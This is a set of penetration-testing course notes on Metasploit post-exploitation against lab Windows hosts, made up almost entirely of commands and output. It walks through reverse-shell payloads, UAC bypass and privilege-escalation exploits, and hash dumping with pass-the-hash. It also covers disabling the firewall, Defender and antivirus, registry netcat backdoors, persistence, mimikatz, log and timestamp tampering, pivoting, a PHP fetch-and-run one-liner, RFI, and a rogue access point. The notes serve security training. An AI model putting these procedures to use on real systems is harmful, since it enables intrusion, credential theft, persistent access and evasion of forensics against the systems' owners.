Kali Linux Penetration Testing 146 Mestasploit Post Penetration Testing Phase

This article records the detailed process of learning and using Kali Linux 2018.1 and penetration testing. The tutorial is the course "Kali Linux Penetration Testing" in the Security Niu Classroom

Kali Linux Penetration Testing (Yuan Fanghong) Blog Record

1. Preparations

• Expand your results after gaining control of the target system

  • escalation of rights
  • collect message
  • Infiltrate the intranet
  • permanent backdoor

• Expand your results based on existing sessions

  • msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe

• Kali monitor

  msf > use exploit/multi/handler
  msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  msf exploit(multi/handler) > set LHOST 10.0.0.128
  msf exploit(multi/handler) > exploit -j
  

• Windows system executes payload.exe

• kali into metepreter

  msf exploit(multi/handler) > sessions 
  
  Active sessions
  ===============
  
    Id  Name  Type                     Information             Connection
    --  ----  ----                     -----------             ----------
    1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
  
  msf exploit(multi/handler) > sessions 
  
  Active sessions
  ===============
  
    Id  Name  Type                     Information             Connection
    --  ----  ----                     -----------             ----------
    1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
  
  msf exploit(multi/handler) > sessions -i 1
  [*] Starting interaction with 1...
  
  meterpreter > getuid
  Server username: WIN7-VM\John
  

2. Obtain system account permissions

• Privilege escalation failed, usually due to UAC restrictions

  meterpreter > getuid
  Server username: WIN7-VM\John
  meterpreter > load priv
  [-] The 'priv' extension has already been loaded.
  meterpreter > getsystem 
  [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
  [-] Named Pipe Impersonation (In Memory/Admin)
  [-] Named Pipe Impersonation (Dropper/Admin)
  [-] Token Duplication (In Memory/Admin)
  
  
  meterpreter > background
  

• Bypass UAC restrictions

  • use exploit/windows/local/ask

    use exploit/windows/local/ask
    set payload windows/meterpreter/reverse_tcp
    use exploit/windows/local/ask
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.128
    set FILENAME win_update.exe
    set SESSION 1
    exploit
    

    

    

    meterpreter > getsystem
    meterpreter > getuid
    

    

  • use exploit/windows/local/bypassuac

    use exploit/windows/local/bypassuac
    set SESSION 1
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.128
    show targets
    exploit
    

    

  • use exploit/windows/local/bypassuac_injection

    use exploit/windows/local/bypassuac_injection
    set SESSION 1
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.128
    exploit
    

    

• Exploit the vulnerability to directly escalate the privilege to the system

  • use exploit/windows/local/ms13_053_schlamperei

    use exploit/windows/local/ms13_053_schlamperei
    set SESSION 1
    

    

  • use exploit/windows/local/ms13_081_track_popup_menu

    use exploit/windows/local/ms13_081_track_popup_menu
    set SESSION 1
    exploit
    

    

  • use exploit/windows/local/ms13_097_ie_registry_symlink

    use exploit/windows/local/ms13_097_ie_registry_symlink
    set SESSION 1
    set URIPATH /
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.128
    set SRVHOST 10.0.0.128
    exploit
    

  • use exploit/windows/local/ppr_flatten_rec

    use exploit/windows/local/ppr_flatten_rec
    set SESSION 1
    exploit
    

    

• Graphical payload

  • set payload windows/vncinject/reverse_tcp

    use exploit/windows/local/ppr_flatten_rec
    set payload windows/vncinject/reverse_tcp
    set SESSION 1
    set LHOST 10.0.0.128
    set ViewOnly false
    exploit
    

    

• Turn off the UAC function

  • get hashdump

    meterpreter > hashdump
        Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    

  • try to exploit

    use exploit/windows/smb/psexec
    set RHOST 10.0.0.132
    set SMBUser John
    set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.128
    exploit
    

    

    Error: Exploit failed [no-access]

  • UAC needs to be turned off early

    sessions -i 2
    shell
    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    shutdown -r -t 0
    

    

  • reuse

    use exploit/windows/smb/psexec
    set RHOST 10.0.0.132
    set SMBUser John
    set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.128
    exploit
    

4. Basic operations

1. Turn off the firewall

• Requires administrator or system privileges

  netsh advfirewall set allprofiles state on
  netsh advfirewall set allprofiles state off
  

  

2. Close windefend

• View service name

  

• turn off firewall

  net stop windefend
  

3. Bitlocker encryption

• manage-bde -off C:
• manage-bde -status C:

4. Turn off DEP

• bcdedit.exe /set {current} nx AlwaysOff

5 Kill antivirus software

• run killav
• run post / windows / manage / killav

6. Enable Remote Desktop Services

# 开启服务
run post/windows/manage/enable_rdp

# 关闭服务
run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt

# 开启服务
run getgui –e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc

7. View Remote Desktop

• screenshot
• use spy
  
  • screengrab

5. Attacking Domain Controllers Using Tokens

-tokens
- Temporary tokens bound to the account each time the user logs in
- Submit tokens for authentication when accessing resources, similar to web cookies
- delegate tokens: interactive login sessions
- impersonate tokens: non-interactive login sessions
- delegate tokens change after account logout For Impersonate Token, the permissions are still valid

• Incognito

  • Standalone software, integrated in meteorreter by msf
  • No password or crack or get password hash, steal tokens and disguise yourself as another user
  • Especially suitable for privilege escalation and penetration of multiple operating systems in a domain environment

• Build a domain environment

  • DC + XP

• load incognito

  • list_tokens -u
  • impersonate_token lab\administrator
  • Running the above command requires getsystem
    
    • Local ordinary permissions users need local permissions first
    • use exploit/windows/local/ms10_015_kitrap0d
    • execute -f cmd.exe -i -t # -t: execute the program using the current fake tokens
    • shell

8. Registry

• The registry holds almost all configuration parameters of windows

  • Improper modification can directly cause the system to crash
  • Make a full backup of the registry before modifying
  • Some registry modifications are irreversible

• common use

  • Modify and add startup items
  • Steal confidential information stored in the registry
  • Bypassing file-based virus detection

• Add nc backdoor service (metepreter) with registry

  • meterpreter >
  • upload /usr/share/windows-binaries/nc.exe C:\windows\system32
  • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
  • reg setval -k HKLM \ software \ microsoft \ windows \ currentversion \ run -v nc -d 'C: \ windows \ system32 \ nc.exe -Ldp 444 -e cmd.exe'
  • reg queryval -k HKLM \ software \ microsoft \ windows \ currentversion \ Run -v nc

• Open firewall ports (metepreter)

  • meterpreter >
  • execute -f cmd -i -H
  • netsh firewall show opmode
  • netsh firewall add portopening TCP 4444 “test” ENABLE ALL
  • shutdown -r -f -t 0
  • nc 10.0.0.132 444

• Other registry keys

  • https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart

9. Packet capture

• Packet capture (metepreter)
  
  • load sniffer
  • sniffer_interfaces
  • sniffer_start 2
  • sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
  • Circularly store captured packets (50000 packets) in a buffer block in memory, without writing to hard disk
  • Intelligently filter metepreter traffic, and use SSL/TLS encryption for the full name of transmission
• decoding
  
  • use auxiliary/sniffer/psnuffle
  • set PCAPFILE /root/1.cap

10. Search files

• search -f *.ini
• search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

11. Cracking weak passwords

• John the Ripper cracks weak passwords

– use post/windows/gather/hashdump # system permission metepreter
- run # results are saved in /tmp directory
- use auxiliary/analyze/jtr_crack_fast
- run

12. Erasing traces

• File system access leaves traces. Electronic forensics focus
• Penetration tests and attackers often want to destroy traces of file system access

• The best way to avoid detection by forensics: don't touch the file system

  • The innate advantage of metepreter (completely based on memory)

• MAC 时间 （Modified / Accessed / Changed）

  • ls -l –time=atime/mtime/ctime 1.txt
  • stat 1.txt
  • touch -d “2 days ago” 1.txt
  • touch -t 1501010101 1.txt

• MACE ： MFT entry

  • MFT: Master File Table for NTFS file system
  • Usually 1024 bytes or 2 hard disk sectors, which store multiple entry information
  • Contains file lots of information (size name directory location disk location creation date)
  • For more information, study file system forensic analysis techniques

• Timestomp (meterpreter)

  • timestomp -v 1.txt
  • timestomp -fc:\autoexec.bat 1.txt
    -b -r # Erase MACE time information, currently this parameter function is invalid
  • -m / -a / -c / -e / -z
  • timestomp -z “MM/DD/YYYY HH24:MI:SS” 2.txt

13. pivoting springboard / pivot / fulcrum

• msfvenom production payload
  msfvenom -a x86 –platform windows -p windows / meterpreter / reverse_tcp LHOST = kali_firewall LPORT = 4444 -b “\ x00 \ xff” -e x86 / shikata_ga_nai -f exe -o payload.exe

• Get system permissions
  

• Use an already controlled computer as a springboard for intrusion into the intranet

• From the point of view of other intranet computers, the access all comes from the springboard

• run autoroute -s 1.1.1.0/24 # Intranet segment of the attacked target that cannot access the external network

• Automatic routing of real-world scenarios

  • Use win7 to attack the internal network XP (compare xp with or without access to the external network)
    – scan the internal network: use auxiliary/scanner/portscan/tcp

• Port forwarding portfwd for Pivoting

  • Use already controlled computer to realize port forwarding between kali and attack target
  • portfwd add -L LIP -l LPORT -r RIP -p RPORT
  • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
  • portfwd list / delete / flush

• use exploit/windows/smb/ms08_067_netapi

  • set RHOST 127.0.0.1
  • set LHOST 2.1.1.10
• use exploit/multi/handler
  
  • set exitonsession false

14. POST module

• meterpreter >
• run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
• run post/windows/gather/checkvm
• run post/windows/gather/credentials/credential_collector
• run post/windows/gather/enum_applications
• run post/windows/gather/enum_logged_on_users
• run post/windows/gather/enum_snmp
• run post/windows/manage/delete_user USERNAME=yuanfh
• run post/multi/recon/local_exploit_suggester
• run post/multi/gather/env
• run post/multi/gather/firefox_creds
• run post/multi/gather/ssh_creds
• run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
• run hostsedit -e 1.1.1.1, www.baidu.com
• migrate -N explorer.exe
• run [tab] [tab]

• run winenum

• Automate meteor script execution

  • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
  • set InitialAutoRunScript checkvm

• Automatically execute the post module

  • set InitialAutoRunScript migrate -n explorer.exe
  • set AutoRunScript post/windows/gather/dumplinks

15. Persistent backdoors

• In the running memory of meteorreter obtained by exploiting the vulnerability, restarting fails
• Repeated exploits may crash services

• Persistent backdoor guarantees remote control after bug is fixed

• metepreter backdoor

  • run metsvc -A # Exclusion -r
  • use exploit/multi/handler
  • set PAYLOAD windows/metsvc_bind_tcp
  • set LPORT 31337
  • set LIST 1.1.1.1

• persistent backdoor

  • run persistence -h
  • run persistence -X -i 10 -p 4444 -r 10.0.0.128
  • run persistence -U -i 20 -p 4444 -r 10.0.0.128
  • run persistence -S -i 20 -p 4444 -r 10.0.0.128

16. mimikatz of msf extension usage

• hashdump uses part of the functionality of mimikatz
  
  • getsystem
  • load mimikatz
  • wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
  • mimikatz_command -h
  • mimikatz_command -f a::
  • mimikatz_command -f samdump::hashes
  • mimikatz_command -f handle::list
  • mimikatz_command -f service::list
  • mimikatz_command -f crypto::listProviders
  • mimikatz_command -f winmine::infos # minesweeper game

17. Code Execution Vulnerabilities

• PHP shell

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
  • msf start listening
  • Upload to web site and access via browser

• web Delivery

  • Exploiting a Code Execution Vulnerability to Access an Attacker's Server
  • use exploit/multi/script/web_delivery
  • set target 1
  • run
  • php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/fTYWqmu‘));”

18. RFI remote file contains

• vi /etc/php5/cgi/php.ini
  
  • allow_url_fopen = On
  • allow_url_include = On
• use exploit/unix/webapp/php_include
• set LIST 1.1.1.2
• set PATH /dvwa/vulnerabilities/fi/
• set PHPURI /?page=XXpathXX
• set HEADERS “Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7”
• set payload php/meterpreter/reverse_tcp
• set lhost 1.1.1.1
• exploit

18. Karmetasploit

• Forging AP, sniffing password, receiving data, browser attack

• Multi-vulnerability resource file: wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

• Install other dependencies

  • gem install activerecord sqlite3-ruby

• Infrastructure installation configuration

  • apt-get install isc-dhcp-server
  • cat /etc/dhcp/dhcpd.conf
    option domain-name-servers 10.0.0.1; default-lease-time 60;
    max-lease-time 72;
    ddns-update-style none;
    authoritative;
    log-facility local7;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
    }

• fake AP

  • airmon-ng start wlan0
  • airbase -ng -P -C 30 -e “FREE” -v wlan0mon
  • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
  • touch /var/lib/dhcp/dhcpd.leases
  • dhcpd -cf /etc/dhcp/dhcpd.conf at0

• Launch Karmetasploit

  • msfconsole -q -r karma.rc_.txt

• Allow users to surf the Internet normally

  • vi karma.rc_.txt

    File link: https://pan.baidu.com/s/1ShLYDGaoIo9M-ihU0iN8Eg Password: tpc0

  • remove setg parameter

  • Add browser_autopwn2 and other modules
  • Check for malicious traffic: auxiliary/vsploit/malware/dns*

• Launch Karmetasploit

  • msfconsole -q -r karma.rc_.txt

• Add routing and firewall rules

  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -P FORWARD ACCEPT
  • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE